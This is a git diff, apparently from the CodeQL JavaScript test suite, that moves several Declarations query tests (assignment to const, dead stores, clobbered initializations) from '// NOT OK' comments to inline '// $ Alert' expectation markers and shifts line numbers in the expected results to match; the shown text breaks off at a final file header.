b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected @@ -1,7 +1,7 @@ -| classes.js:4:1:4:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | -| functions.js:4:10:4:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | -| tst.js:4:1:4:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:7:1:7:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:10:5:10:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:13:1:13:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:25:10:25:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:24:5:24:19 | const c = null; | declared | +| classes.js:3:1:3:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | +| functions.js:3:10:3:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | +| tst.js:3:1:3:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:5:1:5:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:7:5:7:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:9:1:9:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:21:10:21:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:20:5:20:19 | const c = null; | declared | diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref index a9c879e52c68..0003a1f3c6f5 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref @@ -1 +1,2 @@ -Declarations/AssignmentToConst.ql \ No newline at end of file +query: Declarations/AssignmentToConst.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js index 93bb382719f5..5a8866778884 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -class C {} +class C {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js index 5f022c603b78..3997e1366e7f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js @@ -1,4 +1,4 @@ -// OK: `const` is block scoped in ECMAScript 2015 +// OK - `const` is block scoped in ECMAScript 2015 function f() { { const val = 1; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js index e23c770f2ad1..130f0278d657 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -function C() {} +function C() {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js index 929a95754f81..5f66a500f8b5 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js @@ -1,2 +1 @@ -// OK -const s = "there"; \ No newline at end of file +const s = "there"; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js index c68d2380e017..fc40d5d3650c 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js @@ -1,26 +1,22 @@ const x = 23, y = 42; -// NOT OK -x = 42; +x = 42; // $ Alert -// NOT OK -y = 23; +y = 23; // $ Alert -// NOT OK -var y = -1; +var y = -1; // $ Alert -// NOT OK -++x; +++x; // $ Alert var z = 56; -// OK + z = 72; -// OK + const s = "hi"; (function (){ const c = null; - for ([ c ] of o); + for ([ c ] of o); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected index 7063b316a62e..501e442bcbf2 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected @@ -1 +1 @@ -| tst.js:3:24:3:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:3:9:3:21 | key = iter[0] | earlier initialization | +| tst.js:2:24:2:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:2:9:2:21 | key = iter[0] | earlier initialization | diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref index 09f107b9c2de..f93499b1f13e 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref @@ -1 +1,2 @@ -Declarations/ClobberingVarInit.ql \ No newline at end of file +query: Declarations/ClobberingVarInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js index 00ca7e51f7cf..c1060f0280ab 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js @@ -1,12 +1,11 @@ for (var iter in Iterator(aExtraHeaders)) { - // NOT OK - var key = iter[0], key = iter[1]; + var key = iter[0], key = iter[1]; // $ Alert xhr.setRequestHeader(key, value); } -// OK + var tmp = f(), tmp = tmp + 19; -// OK + var a, b, a = 42; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref index fc7a36de5226..5bef6c78f6a8 100644 --- a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref +++ b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref @@ -1 +1,2 @@ -Declarations/ConflictingFunctions.ql \ No newline at end of file +query: Declarations/ConflictingFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js index 5b6ec033a8ad..4ab06d946b95 100644 --- a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js @@ -1,6 +1,6 @@ function f(x) { if (x > 23) { - function g() { + function g() { // $ Alert return 42; } } else { diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected index 3c4777ca5a6f..d4f34fa75983 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:1 | g | This definition of g is useless, since its value is never read. | +| tst.js:1:1:1:1 | g | This definition of g is useless, since its value is never read. | | worker.js:3:1:3:9 | onmissage | This definition of onmissage is useless, since its value is never read. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref index e24cf1256f74..7ccb2ebe73ef 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfGlobal.ql \ No newline at end of file +query: Declarations/DeadStoreOfGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js index 6628880d6c55..5dc730c2d4c5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js @@ -1,31 +1,23 @@ -// NOT OK -g = 23; +g = 23; // $ Alert -// OK h = 23; alert(h); -// OK uid = 0; function incr() { return uid++; } -// OK function foo() { var x; x = 0; } -// OK onload = function() {} -// OK global = 42; -// OK prop = 42; -// OK /*global otherGlobal*/ -otherGlobal = 56; \ No newline at end of file +otherGlobal = 56; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js index d8fec2d35077..d7baebc8443c 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js @@ -1,3 +1,3 @@ onmessage = function() { console.log("Got a message!"); }; -onmissage = function() { console.log("How did that happen?"); }; \ No newline at end of file +onmissage = function() { console.log("How did that happen?"); }; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected index 88b5fc55b25c..8d5b7af35dab 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected @@ -1,13 +1,13 @@ | overload.ts:10:12:10:14 | baz | The value assigned to baz here is unused. | -| tst2.js:26:9:26:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst2.js:28:9:28:14 | x = 42 | The value assigned to x here is unused. | -| tst3.js:2:1:2:36 | exports ... a: 23 } | The value assigned to exports here is unused. | -| tst3b.js:2:18:2:36 | exports = { a: 23 } | The value assigned to exports here is unused. | -| tst.js:6:2:6:7 | y = 23 | The value assigned to y here is unused. | -| tst.js:13:6:13:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | -| tst.js:13:14:13:19 | a = 42 | The value assigned to a here is unused. | -| tst.js:45:6:45:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:51:6:51:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:132:7:132:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | -| tst.js:162:6:162:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | -| tst.js:172:7:172:17 | nSign = foo | The value assigned to nSign here is unused. | +| tst2.js:25:9:25:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst2.js:27:9:27:14 | x = 42 | The value assigned to x here is unused. | +| tst3.js:1:1:1:36 | exports ... a: 23 } | The value assigned to exports here is unused. | +| tst3b.js:1:18:1:36 | exports = { a: 23 } | The value assigned to exports here is unused. | +| tst.js:5:2:5:7 | y = 23 | The value assigned to y here is unused. | +| tst.js:11:6:11:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | +| tst.js:11:14:11:19 | a = 42 | The value assigned to a here is unused. | +| tst.js:43:6:43:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:49:6:49:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:130:7:130:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | +| tst.js:160:6:160:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | +| tst.js:170:7:170:17 | nSign = foo | The value assigned to nSign here is unused. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref index eb773fe0490a..9c9da7e09a35 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfLocal.ql \ No newline at end of file +query: Declarations/DeadStoreOfLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts index c97993c88a51..3dfc6b0e2e54 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts @@ -1,11 +1,11 @@ import dummy from 'dummy'; -var key1 = "key1"; // OK +var key1 = "key1"; export class NoConstructor { [key1] = 4; } -var key2 = "key2"; // OK +var key2 = "key2"; export class WithConstructor { [key2] = 4; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts index 90199399794d..2f93aba1b9c7 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts @@ -1,16 +1,16 @@ -import { Foo } from "./exportSymbol" // OK +import { Foo } from "./exportSymbol" export interface FooMap { - [Foo]: number; // OK + [Foo]: number; } -const Bar = "Bar"; // OK +const Bar = "Bar"; export interface BarMap { [Bar]: number; } -const Baz = "Baz"; // OK +const Baz = "Baz"; if (false) { Baz; @@ -18,7 +18,7 @@ if (false) { function getBaz(): typeof Baz { return null; } -class C {} // OK +class C {} if (false) { C; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts index 6481a749c40c..007bf441d6df 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts @@ -1,5 +1,5 @@ -var C1 = global.C1; // OK -var C2 = global.C2; // OK +var C1 = global.C1; +var C2 = global.C2; class C extends C1 {} export default class extends C2 {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts index 5c6b48f8796c..c8dba3d68896 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts @@ -1,3 +1,3 @@ -var C1 = global.C1; // OK +var C1 = global.C1; export default function(x=C1) {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js index eab95b4787f6..68b79aac8e68 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js @@ -1,4 +1,4 @@ -const React = require('react'); // OK: used in `extends` clause below +const React = require('react'); // OK - used in `extends` clause below class Foo extends React.Component { } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js index da26a3557ade..8e923b565ee2 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js @@ -2,7 +2,7 @@ function f() { let y = false; for (const x of [1, 2, 3]) { if (x > 0) { - y = true; // OK + y = true; continue; } return; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts index 4335cd3880aa..3d00634499f8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts @@ -9,5 +9,5 @@ namespace a.b.q { registerSomething(c); - function foo() {} // OK + function foo() {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts index d2be60c12874..255c80093466 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts @@ -1,13 +1,13 @@ export function foo() { - function bar(x: number): number; // OK - function bar(x: string): string; // OK - function bar(x: any) { // OK + function bar(x: number): number; + function bar(x: string): string; + function bar(x: any) { return x; } - function baz(x: number): number; // OK - function baz(x: string): string; // OK - function baz(x: any) { // NOT OK, overwritten before use + function baz(x: number): number; + function baz(x: string): string; + function baz(x: any) { // $ Alert - overwritten before use return x; } baz = (x) => x; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js index f19b1656da23..31d321711cfa 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js @@ -1,17 +1,15 @@ function f() { - // OK: initialization to default value + // OK - initialization to default value var x = null, y = undefined, z; x = {}; - // NOT OK - y = 23; + y = 23; // $ Alert y = 42; for (var p in x) y+p; - // OK: assignment to global + // OK - assignment to global global = 42; - // NOT OK - var a = 23; a = 42; - // OK: captured variable + var a = 23; a = 42; // $ Alert + // OK - captured variable var b = 42; return function() { return b%2 @@ -20,14 +18,14 @@ function f() { function g() { var x; - // OK + x = 23, x += 19; - // OK + var y = 42; } function h() { - // OK + var x = false; try { this.mayThrow(); @@ -37,18 +35,18 @@ function h() { } function k(data) { - // OK + for(var i=0;i .5) - // OK + i = 23; } } @@ -87,11 +85,11 @@ function s() { var container = document.createElement("div"), div = document.createElement("div"); doStuffWith(container, div); - // OK + container = div = null; } -// OK: the function expression could be made anonymous, but it's not +// OK - the function expression could be made anonymous, but it's not // worth flagging this as a violation defineGetter(req, 'subdomains', function subdomains() { var hostname = this.hostname; @@ -103,7 +101,7 @@ defineGetter(req, 'subdomains', function subdomains() { return subdomains.slice(offset); }); -// OK: assigning default values +// OK - assigning default values function t() { var x; x = false; @@ -112,7 +110,7 @@ function t() { x = 42; return x; } -// OK: unnecessary initialisation as type hint +// OK - unnecessary initialisation as type hint function u() { var x; x = []; @@ -120,7 +118,7 @@ function u() { x = 42; return x; } -// OK: assigning `undefined` +// OK - assigning `undefined` function v() { var x; x = void 0; @@ -129,12 +127,12 @@ function v() { } !function(o) { - var {x} = o; + var {x} = o; // $ Alert x = 42; return x; } -// OK: assignments in dead code not flagged +// OK - assignments in dead code not flagged !function() { return; var x; @@ -159,7 +157,7 @@ function v() { }); (function() { - let [x] = [0], // OK, but flagged due to destructuring limitations + let [x] = [0], // $ SPURIOUS: Alert - flagged due to destructuring limitations y = 0; x = 42; y = 87; @@ -169,7 +167,7 @@ function v() { (function() { if (something()) { - var nSign = foo; + var nSign = foo; // $ Alert } else { console.log(nSign); } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js index 55cff458fca5..542e9ac06c35 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js @@ -1,5 +1,5 @@ function outer(b) { - // OK + let addSubdomain = false; if (x) { @@ -16,15 +16,14 @@ function outer(b) { } function f(event) { - // OK + var message = event.data; eme.init().then(() => NativeInfo.processApp('install', message.id)); } function g() { - // NOT OK - let x = 23; + let x = 23; // $ Alert { - x = 42; + x = 42; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js index 91a09ed03d7d..396ba397e55f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js @@ -1,2 +1 @@ -// NOT OK -exports = module.exports = { a: 23 }; +exports = module.exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js index ca9ae499600f..918b117bf273 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js @@ -1,2 +1 @@ -// NOT OK -module.exports = exports = { a: 23 }; +module.exports = exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref index 448709b9054f..935b07264eb8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfProperty.ql \ No newline at end of file +query: Declarations/DeadStoreOfProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js index 43db65532a09..784cb1ffc328 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js @@ -1,7 +1,7 @@ class C { - static get foo() {} // OK - static set foo(v) {} // OK + static get foo() {} + static set foo(v) {} - get bar() {} // OK - set bar(v) {} // OK + get bar() {} + set bar(v) {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js index c4b70604781d..3bd03c882ef8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js @@ -1,3 +1,3 @@ var exports = module.exports; -exports.answer = "yes"; // NOT OK +exports.answer = "yes"; // $ Alert exports.answer = "no"; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts index a2b922684dda..8be98d94dd00 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts @@ -1,5 +1,5 @@ class C { - f; // OK + f; constructor() { this.f = 5; @@ -7,7 +7,7 @@ class C { } class D { - f = 4; // NOT OK + f = 4; // $ Alert constructor() { this.f = 5; @@ -15,7 +15,7 @@ class D { } class G { - constructor(public h: string) { // NOT OK + constructor(public h: string) { // $ Alert this.h = h; } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js index 282f6bc7f4aa..6edb03fb4a67 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js @@ -2,7 +2,7 @@ var o = f1(); while (f2()) { if (f4()) { - o.p = 42; // NOT OK + o.p = 42; // $ Alert break; } f5(); @@ -12,8 +12,8 @@ (function(){ var o = f1(); - o.p1 = o.p1 += 42; // NOT OK - o.p2 -= (o.p2 *= 42); // NOT OK + o.p1 = o.p1 += 42; // $ Alert + o.p2 -= (o.p2 *= 42); // $ Alert }); (function(){ @@ -26,7 +26,7 @@ f3(); } catch (e) { f4(); - o.p = 42; // NOT OK + o.p = 42; // $ Alert } } o.p = 42; @@ -35,5 +35,5 @@ (function(){ var o = f1(); - o.p = f2() ? o.p = f3() : f4(); // NOT OK + o.p = f2() ? o.p = f3() : f4(); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js index 39db5056b77b..0c82a9884b44 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js @@ -1,26 +1,26 @@ (function(){ var o = {}; - o.pure1 = 42; // NOT OK + o.pure1 = 42; // $ Alert o.pure1 = 42; - o.pure2 = 42; // NOT OK + o.pure2 = 42; // $ Alert o.pure2 = 43; o.impure3 = 42; f(); o.impure3 = 42; - o.pure4 = 42; // NOT OK + o.pure4 = 42; // $ Alert 43; o.pure4 = 42; o.impure5 = 42; o.impure5 = f(); - o.pure6 = f(); // NOT OK + o.pure6 = f(); // $ Alert o.pure6 = 42; - o.pure7 = 42; // NOT OK + o.pure7 = 42; // $ Alert if(x){} o.pure7 = 42; @@ -73,7 +73,7 @@ o15.pure15_aliasWrite = 42; var o16 = x? o: null; - o.pure16_simpleAliasWrite = 42; // NOT OK + o.pure16_simpleAliasWrite = 42; // $ Alert o16.pure16_simpleAliasWrite = 42; var o17 = { @@ -82,57 +82,57 @@ } // DOM - o.clientTop = 42; // OK + o.clientTop = 42; o.clientTop = 42; - o.defaulted1 = null; // OK + o.defaulted1 = null; o.defaulted1 = 42; - o.defaulted2 = -1; // OK + o.defaulted2 = -1; o.defaulted2 = 42; var o = {}; - o.pure18 = 42; // NOT OK - o.pure18 = 42; // NOT OK + o.pure18 = 42; // $ Alert + o.pure18 = 42; // $ Alert o.pure18 = 42; var o = {}; - Object.defineProperty(o, "setter", { // OK + Object.defineProperty(o, "setter", { set: function (value) { } }); o.setter = ""; - var o = { set setter(value) { } }; // OK + var o = { set setter(value) { } }; o.setter = ""; var o = { - set accessor(value) { }, // OK + set accessor(value) { }, get accessor() { } }; var o = { set setter(value) { } }; - o.setter = 42; // probably OK, but still flagged - it seems fishy + o.setter = 42; // $ Alert - probably OK, but still flagged - it seems fishy o.setter = 87; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // NOT OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // $ Alert o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK, default value + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK - default value o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) // OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) o.prop = 42; var o = {}; - o.pure19 = 42; // OK + o.pure19 = 42; o.some_other_property = 42; o.pure19 = 42; var o = {}; - o.pure20 = 42; // OK + o.pure20 = 42; some_other_obj.some_other_property = 42; o.pure20 = 42; }); diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref index a017c3bc5aad..cff8cc1360ff 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref @@ -1 +1,2 @@ -Declarations/DeclBeforeUse.ql +query: Declarations/DeclBeforeUse.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index bdb76a070b7d..29eb66403511 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ 